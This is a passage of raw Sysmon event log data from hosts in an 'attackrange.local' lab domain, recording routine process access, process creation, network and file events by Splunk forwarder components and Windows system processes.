Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000083701Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:31.400{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B553-615A-9D01-00000000FD01}172C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000083700Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:31.400{2FDD8D40-B553-615A-9D01-00000000FD01}172C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000083699Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:27.644{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50188-false10.0.1.12-8000- 23542300x8000000000000000108221Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:32.699{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41732906D6FD875B741E63FCD6CF5816,SHA256=422A439E966AF24D44AD1A752D45693EC0EDC0A6A89A326D08CCE9F9869318E9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000083744Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:32.884{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B554-615A-9F01-00000000FD01}800C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083743Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:32.884{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083742Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:32.884{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083741Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:32.884{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083740Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:32.884{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083739Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:32.884{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083738Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:32.884{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083737Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:32.884{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083736Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:32.884{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083735Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:32.884{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083734Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:32.884{2FDD8D40-AC98-615A-0500-00000000FD01}412528C:\Windows\system32\csrss.exe{2FDD8D40-B554-615A-9F01-00000000FD01}800C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000083733Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:32.884{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B554-615A-9F01-00000000FD01}800C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000083732Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:32.886{2FDD8D40-B554-615A-9F01-00000000FD01}800C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000083731Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:32.556{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E2A72BEE34F510A8E6B7DC9E3010063,SHA256=8EC65570C9CFCDE82C54C420DE5E647B8C009120CA24EB50EFE24FC5256D83B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083730Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:32.556{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3A7697FD0E9FE3C9D63C52B8E1BA80AB,SHA256=8DB2FDE211094000FFCFBC2FBC39638DEF5F73946CF7DA2E59AC79D0741E279D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083729Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:32.556{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B30DAF50F62D5728453B50495EE938BC,SHA256=D21EB5991D17EF5BD8090A75D428CBCE6F7ED88BC02A6AA164E0BB480860E70F,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000083728Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:29.441{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50189-false10.0.1.12-8089- 10341000x800000000000000083727Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:32.072{2FDD8D40-B553-615A-9E01-00000000FD01}25123972C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000108220Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:32.147{58E9C193-ACA7-615A-1300-00000000FC01}880NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=D69376631B798316AAD53EA167F320F1,SHA256=B73A256BE8AA8471C22EF9B9D956758EDEC0643B82561AE64FE9CBA81D7798CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108219Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:32.016{58E9C193-B422-615A-0602-00000000FC01}5552ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Local\Mozilla\Firefox\Profiles\p09s3i8p.default-release\cache2\doomed\23144MD5=B8B6A57EBDB524FDBA65702D6C799E7F,SHA256=75EC774283ACFB6271697D68AC34579E7CF46CE2B5C28BE9E70ADF991586A695,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108223Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:33.729{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3DF52828762F0170885512A9EFEF3822,SHA256=BD0780E495C43F22D8693BD0941AD2148100CE4E5E7435C9D5CF0B9AD5558B7B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083746Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:33.947{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3A7697FD0E9FE3C9D63C52B8E1BA80AB,SHA256=8DB2FDE211094000FFCFBC2FBC39638DEF5F73946CF7DA2E59AC79D0741E279D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083745Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:33.572{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7B183A9406BD40059FD2AF4707532D2,SHA256=A8FE22308FD8BE6409B1D25CC6D62A190EC8E45D39194FCCBA2A58024D50523F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000108222Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:32.096{58E9C193-B422-615A-0602-00000000FC01}5552C:\Program Files\Mozilla Firefox\firefox.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51950-false34.117.237.239239.237.117.34.bc.googleusercontent.com443https 23542300x8000000000000000108224Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:03:34.760{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DDD95D8794B4DC8A32409EA52C2AB98,SHA256=C56DA50A1D0678358268041BABEE113A09661CBDCD716F85AAF8AAEC9A2E8516,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000083761Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:34.603{2FDD8D40-B556-615A-A001-00000000FD01}19802484C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000083760Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:34.572{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6FB5CA7BCE57BB9AE3704EBB780C9482,SHA256=96B8F42BE962F88F8BCC8C662C262C334E4BF8213BE4B1CAB0270B8678C9C6C0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000083759Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:34.462{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B556-615A-A001-00000000FD01}1980C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083758Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:03:34.462{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000083757Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 